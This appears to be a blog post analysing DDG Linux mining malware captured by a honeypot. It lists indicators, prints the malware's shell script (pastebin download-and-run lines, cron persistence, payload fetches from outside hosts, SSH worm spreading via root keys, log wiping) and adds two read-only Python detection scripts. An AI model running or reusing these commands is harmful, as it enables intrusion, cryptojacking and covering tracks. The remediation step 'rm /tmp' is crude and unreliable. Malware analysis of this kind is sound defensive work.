[Honeypot Capture] Linux honeypot system captures the DDG mining malware
cmsfree 2019-04-22 18:08:29 664 views

The Linux honeypot detected the DDG mining malware for Linux. The malware is implanted by brute-forcing weak SSH passwords; once on the host it kills other mining malware and DDoS trojans and runs its own miner for profit.

IOC:

  116.85.19.47

Domains:

  https://encodable.com

  http://shop.ybk001.com

  https://pastebin.com

MD5:

  DAFF9129837EC02FB3368D2EBB4731B3

SHA256:

  264DFA0C1E258801D81F949532750D5F295482ACAC2829673CDDB66AD0EC54ED

Intrusion method

1. Brute-forcing weak SSH passwords

(Image: SSH brute-force login attempts captured by the honeypot)

2. After a successful brute-force login, the malware script is downloaded from the malicious site https://pastebin.com/:

(curl -fsSL https://pastebin.com/raw/ZgaEWBUa||wget -q -O- https://pastebin.com/raw/ZgaEWBUa)|sed -e 's/\r//g'|sh

3. Analysis of the malware script:

a. Every 15 minutes it downloads a base64-encoded script from https://pastebin.com/raw and executes it:

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
mkdir -p /tmp
chmod 1777 /tmp
echo "*/15 * * * * (curl -fsSL https://pastebin.com/raw/KkY6JPLA||wget -q -O- https://pastebin.com/raw/KkY6JPLA)|sh" | crontab -

b. It kills other mining and DDoS trojans that may be present on the host:

ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "plfsbce"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "luyybce"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9
netstat -anp|grep 119.9.106.27|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
netstat -anp|grep 104.130.210.206|awk '{print $7}'|sed -e "s/\/.*//g"|xargs kill -9
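As an added example that is not part of the original post, the indicator strings from the malware's own cleanup routine above can be turned into a read-only detection: the script below parses ps -ef and netstat -anp output and reports matches instead of killing them. The sample outputs are constructed, and the DDG payload name kerberods (from section c) is added to the list.

```python
"""Added example (not from the original post): read-only detection using the
indicator strings from the malware's own cleanup routine (section b).
It parses `ps -ef` and `netstat -anp` output and reports matches; it kills nothing.
The sample outputs below are constructed."""
import re

# Substrings the malware greps for in `ps -ef` (section b). Note "systemctI" ends in a
# capital I, a lookalike for the legitimate systemctl.
PROCESS_INDICATORS = [
    "hwlh3wlh44lh", "Circle_MI", "get.bi-chi.com", "hashvault.pro", "nanopool.org",
    "/usr/bin/.sshd", "/usr/bin/bsd-port", "xmr", "xig", "ddgs", "qW3xT", "wnTKYg",
    "t00ls.ru", "sustes", "thisxxs", "hashfish", "kworkerds", "/tmp/devtool",
    "systemctI", "plfsbce", "luyybce", "6Tx3Wq", "dblaunchs", "/boot/vmlinuz",
    "kerberods",  # the DDG payload's own file name (section c), added here
]
# Remote peers the malware looks for in `netstat -anp` (section b).
NETWORK_INDICATORS = ["119.9.106.27", "104.130.210.206"]

def parse_ps_ef(text):
    """Parse `ps -ef` output into (pid, cmd) tuples, skipping the header row."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 7)  # UID PID PPID C STIME TTY TIME CMD
        if len(parts) == 8:
            rows.append((int(parts[1]), parts[7]))
    return rows

def find_suspicious_processes(ps_text):
    """Return [(pid, cmd, indicator)] for each process whose command line contains
    an indicator. Matching is plain case-sensitive substring, exactly like the
    malware's grep, so short indicators such as "xmr" or "xig" can hit legitimate
    processes: review the hits before acting on them."""
    hits = []
    for pid, cmd in parse_ps_ef(ps_text):
        if cmd.split()[0].rsplit("/", 1)[-1] == "grep":  # ignore grep itself
            continue
        for ind in PROCESS_INDICATORS:
            if ind in cmd:
                hits.append((pid, cmd, ind))
                break
    return hits

def find_suspicious_connections(netstat_text):
    """Return [(pid, peer_ip)] for `netstat -anp` rows talking to an indicator IP."""
    hits = []
    for line in netstat_text.splitlines():
        for ip in NETWORK_INDICATORS:
            if ip in line:
                m = re.search(r"\s(\d+)/\S+\s*$", line)  # trailing "PID/Program name"
                if m:
                    hits.append((int(m.group(1)), ip))
    return hits

# Constructed sample output; the kerberods process and its pool connection are the hits.
SAMPLE_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Apr21 ?        00:00:03 /sbin/init
root       981     1  0 Apr21 ?        00:00:00 /usr/sbin/sshd -D
root      4312     1 99 10:02 ?        01:12:55 /tmp/kerberods
root      4390  4312  0 10:02 ?        00:00:00 /usr/bin/systemctI
root      4401   981  0 10:05 pts/0    00:00:00 grep xmr
"""
SAMPLE_NETSTAT = """\
tcp        0      0 10.0.0.5:43122          119.9.106.27:3333       ESTABLISHED 4312/kerberods
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      981/sshd
"""

if __name__ == "__main__":
    for pid, cmd, ind in find_suspicious_processes(SAMPLE_PS):
        print(f"process {pid}: {cmd!r} matches {ind!r}")
    for pid, ip in find_suspicious_connections(SAMPLE_NETSTAT):
        print(f"process {pid} connected to indicator {ip}")
```

On a live host, pipe the real ps -ef and netstat -anp output into the two functions; the list deliberately keeps the malware's own short substrings, so treat a hit on "xmr", "xig" or "/boot/vmlinuz" as a lead to verify rather than a verdict.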

c. The malware checks the machine architecture reported by the kernel (uname -m), downloads the matching payload and executes it:

if [ ! -f "/tmp/.XIMunix" ] || [ ! -f "/proc/$(cat /tmp/.XIMunix)/io" ]; then
    chattr -i kerberods
    rm -rf kerberods
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://encodable.com/uploaddemo/files/x64.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://encodable.com/uploaddemo/files/x64.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://shop.ybk001.com/memberpic/exwhhs201942231402855772.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://shop.ybk001.com/memberpic/exwhhs201942231402855772.jpg -O kerberods) && chmod +x kerberods
    elif [ ${ARCH}x = "i686x" ]; then
        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://encodable.com/uploaddemo/files/x32.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://encodable.com/uploaddemo/files/x32.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://shop.ybk001.com/memberpic/xyftgj2019422314472900044.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://shop.ybk001.com/memberpic/xyftgj2019422314472900044.jpg -O kerberods) && chmod +x kerberods
    else
        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://encodable.com/uploaddemo/files/x32.jpg -o kerberods||wget --timeout=30 --tries=3 -q https://encodable.com/uploaddemo/files/x32.jpg -O kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL http://shop.ybk001.com/memberpic/xyftgj2019422314472900044.jpg -o kerberods||wget --timeout=30 --tries=3 -q http://shop.ybk001.com/memberpic/xyftgj2019422314472900044.jpg -O kerberods) && chmod +x kerberods
    fi
        $(pwd)/kerberods || /usr/bin/kerberods || /usr/libexec/kerberods || /usr/local/bin/kerberods || kerberods || ./kerberods || /tmp/kerberods
fi

d. It reads the server addresses from known_hosts in the .ssh directory, tries to log in to each with the root key, and spreads laterally:

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/KkY6JPLA||wget -q -O- https://pastebin.com/raw/KkY6JPLA)|sh >/dev/null 2>&1 &' & done
fi

Finally, the script empties the root mail spool and the wtmp, secure and cron logs (in sh, "echo 0>file" redirects fd 0 to the file, so each file is truncated to zero bytes rather than written with a 0):

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
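As an added example that is not part of the original post, the script below triages a host for the artifacts described in sections a, c and d and the log wiping above: the cron entry that pipes a paste-site download into sh, the dropper's pid marker file, the hosts in known_hosts that the worm would try to reach next, and logs truncated to zero bytes. All inputs are plain strings and dicts so it runs offline on constructed data; on a live host you would feed it crontab -l output, the contents of /root/.ssh/known_hosts, os.path.getsize() of each log and the host uptime.

```python
"""Added example (not from the original post): offline triage for the persistence
(section a), dropper (section c), lateral-movement (section d) and log-wiping
artifacts described above. Inputs are plain strings and dicts so it runs on
constructed data; on a live host feed it `crontab -l` output, the contents of
/root/.ssh/known_hosts, os.path.getsize() of each log and the host uptime."""
import re

PASTE_HOSTS = ("pastebin.com",)                        # download site used in sections a and d
PIPE_TO_SH = re.compile(r"\|\s*(sh|bash)\b")           # "... | sh" in a cron command
IPV4 = re.compile(r"\b([0-9]{1,3}\.){3}[0-9]{1,3}\b")  # same regex the malware runs on known_hosts
DROPPER_MARKER = "/tmp/.XIMunix"                       # pid marker the dropper checks (section c)
WIPED_LOGS = ["/var/spool/mail/root", "/var/log/wtmp", "/var/log/secure", "/var/log/cron"]

def suspicious_cron_entries(crontab_text):
    """Crontab lines that fetch from a paste site and pipe the download into a shell."""
    return [line for line in crontab_text.splitlines()
            if any(h in line for h in PASTE_HOSTS) and PIPE_TO_SH.search(line)]

def pivot_candidates(known_hosts_text):
    """IPv4 hosts the malware would try with root's key (section d). After a
    compromise these are the next machines to check and to rotate keys on."""
    return sorted({m.group(0) for m in IPV4.finditer(known_hosts_text)})

def truncated_logs(log_sizes, uptime_seconds, min_uptime=3600):
    """Logs that are zero bytes on a host that has been up a while. `echo 0>/var/log/wtmp`
    redirects fd 0 to the file, so the file is truncated to empty, not written with "0".
    Zero-length wtmp/secure/cron logs on a long-running host are a strong wiping signal."""
    if uptime_seconds < min_uptime:
        return []
    return [p for p in WIPED_LOGS if log_sizes.get(p) == 0]

def triage(crontab_text, known_hosts_text, log_sizes, uptime_seconds, existing_paths):
    """Combine the checks into one report dict."""
    return {
        "cron": suspicious_cron_entries(crontab_text),
        "pivot_targets": pivot_candidates(known_hosts_text),
        "wiped_logs": truncated_logs(log_sizes, uptime_seconds),
        "dropper_marker": DROPPER_MARKER in existing_paths,
    }

# Constructed sample data modelled on the script above (key material is fake).
SAMPLE_CRONTAB = """\
*/15 * * * * (curl -fsSL https://pastebin.com/raw/KkY6JPLA||wget -q -O- https://pastebin.com/raw/KkY6JPLA)|sh
0 3 * * * /usr/local/bin/backup.sh
"""
SAMPLE_KNOWN_HOSTS = """\
10.0.0.7 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyMaterial
[10.0.0.9]:2222 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedKeyMaterial
build.internal ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedKeyMaterial
"""
SAMPLE_LOG_SIZES = {"/var/spool/mail/root": 0, "/var/log/wtmp": 0,
                    "/var/log/secure": 0, "/var/log/cron": 0, "/var/log/messages": 48213}
SAMPLE_PATHS = {"/tmp/.XIMunix", "/tmp/kerberods"}

if __name__ == "__main__":
    report = triage(SAMPLE_CRONTAB, SAMPLE_KNOWN_HOSTS, SAMPLE_LOG_SIZES, 86400, SAMPLE_PATHS)
    for key, value in report.items():
        print(f"{key}: {value}")
```

The pivot list is the most useful output after an incident: the worm only needs an IP literal in known_hosts and an unprotected root key to jump, so every host it returns should get the same triage and a key rotation. Hostnames in known_hosts are ignored on purpose, matching the malware's own regex.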

4. Remediation after infection

a. rm /tmp (delete the malware body)

b. ps auxf | grep -v grep | grep <malware process name> | awk '{print $2}'|xargs kill -9 (kill the malware process)

c. vim ~/.ssh/authorized_keys: if key-based login is in use, also remove from ~/.ssh/authorized_keys (or whatever custom path is configured) any keys that do not belong to you or to other legitimate users

bigone 2019-04-25 09:54:00 Reply
Can the commands above that kill the other trojans be used to check whether a machine has a mining trojan?
cmsfree 2019-04-26 11:39:52 Reply
Reply @bigone: Yes, they can be used to identify it.
Anonymous user 2019-04-23 23:02:59 Reply
I don't get it.
cmsfree 2019-04-26 11:40:01 Reply
The analysis is rather rough.